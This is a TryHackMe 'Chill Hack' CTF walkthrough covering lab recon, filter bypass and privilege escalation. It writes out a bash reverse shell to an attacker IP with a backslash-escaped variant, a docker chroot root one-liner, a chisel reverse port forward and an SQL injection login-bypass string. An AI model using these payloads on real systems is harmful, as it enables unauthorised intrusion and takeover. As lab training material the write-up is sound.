TryHackMe|Chill Hack WriteUp\Walkthrough (English)

Chill Hack

Room Link: https://tryhackme.com/r/room/chillhack

===============================================================

• First you will start by performing an nmap scan. You will get 3 ports open 21,22,80. From -A nmap scan you knew that port 21 allows for anonymous login. So login to the ftp server and get the file note.txt from there. 

• Now gobuster the / directory of the IP. The scan has many results, we are interested in /secret. This directory contains a command execution functionality. If you tried to run ls it won’t work, and this is because filtering is enabled, hence the note in the ftp server. 

It told you here that there is filtering going on, but filtering of what? still we don’t know. Also you have 2 names, which are likely to be usernames.

• To avoid the filtering, you can use a ‘\’ backslash between the letters of the command, for example, ls will be l\s and thus it will work. Now that you know how to escape the filtering you can get a reverse shell. From https://www.revshells.com/ create a reverse bash shell, this will give you this shell bash -i >& /dev/tcp/10.18.96.207/1234 0>&1, however, you need to make changes for it to work ba\sh -c "ba\sh -i >& /dev/tcp/10.18.96.207/1234 0>&1". Here we added ‘\’ to bash and contained the shell in between “ ” as a -c argument. Start a Netcat listener on your machine. Then, take this shell, copy it into the command box and execute it. You will get a shell back to your system. 

• Start looking around at the machine. You need first to retrieve the user flag. cd /home you have 3 users, and you can only access the folder of apaar. It has the flag local.txt but unfortunately, you can’t read it. So go back to cd /var/www there you have 2 folders html and files. html doesn’t have anything interesting, however, files does. cd files you have a file called hacker.php. 

• cat hacker.php

In this file there is an interesting text “You have reached this far. Look in the dark! ….” Look in the dark reminds me of steghide. So the image above might contain something interesting. you can find this image in the images folder that exist in the current directory. cd images then start a python3 server to get the image back to your device. 

• Once you have the image in your device steghide extract -sf hacker-with-laptop_23-2147985341.jpg , it extracted backup.zip. If you try to unzip it, you will need a passphrase since this zip file is encrypted. zip2john backup.zip > zip.hash then john zip.hash –wordlist=/usr/share/wordlists/rockyou.txt and the password is *********. Use this password to unzip the zip file. You will get a source_code.php file. 

• Source-code.php has a php code that accepts the password and the email of a user and makes sure that they are correct. 

 

You can see here that it compares the password coming from the user with the correct password encoded in base64. And from the welcome message we know that its Anurodh account. Now we can log in using ssh as Anurodh to the machine. However. This will wait a bit because we first need to get user apaar in order to retrieve the first flag. 

*Note: you really don’t need to get user apaar, because once you log in as Anurodh and run linpeas.sh you will find a vulnerability that will let you get root, thus you will be able to retrieve the two flags easily. However, for the purpose of learning, I will continue explaining how to get apaar. 

• sudo -l 

 

Notice that www-data can run a script called .helpline.sh as apaar. If you look at the content of this script, you will notice that it is susceptible for command injection because the message is directly handed to bash. To get around this run the script as apaar then when you get asked for a message enter “/bin/bash” you will immediately get a shell. Spawn a bash shell using python and then retrieve the user flag ✨.

• Now that we have the first flag, we don’t need to be apaar anymore, so log in as Anurodh using the credentials obtained earlier to get a very stable shell. Once you are in go to /tmp and upload linpeas.sh and run it. 

You have 95% PE point. From GTFObins search for docker. docker run -v /:/mnt --rm -it alpine chroot /mnt sh will give you a root shell. /bin/bash >> cd /root >> cat proof.txt and you got the root flag ✨.

############################################################################### 

Let’s assume that you didn’t look around when you first got access to the machine as user www-data. Then there is another way to go around this. Upload linpeas.sh then run it. It will tell you about the helpline.sh, thus you will get apaar shell. Also, you will notice port 9001 open that you cannot access from your machine, even if you scanned it with nmap it will appear closed. 

• In order to access this port we will do a port forward, there are numerous ways to do this, I will use chisel. First, you need to download a static binary of chisel to your machine and then transfer it to the target. wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -q. -q for quiet (no output). Once you have it, upload it to the target. 

• To port forward. In your machine run ./chisel server -p 1234 --reverse & and on the target ./chisel client 10.18.96.207:1234 R:9003:127.0.0.1:9001 &. This way when you access port 9003 on your device it will be like accessing port 9001 on the target. 

• Do an nmap scan on this port. 

You have Apache running. Go to http://localhost:9003 and you have a login page. 

Start by seeing if this page is susceptible for sql injection. Enter “ ‘ or ‘1’ = ‘1’ -- - “ in the username field and anything in the password field. Indeed, this login form appears to be vulnerable. 

• Once you log in you will be redirected to hacker.php. if you remember, this is the same page that we looked into in Step 5. 

If you saved the hacker picture and did steghide on it and all the steps that we made from step 5-7 you will get the credentials and get access to the machine and then get root from docker and so on.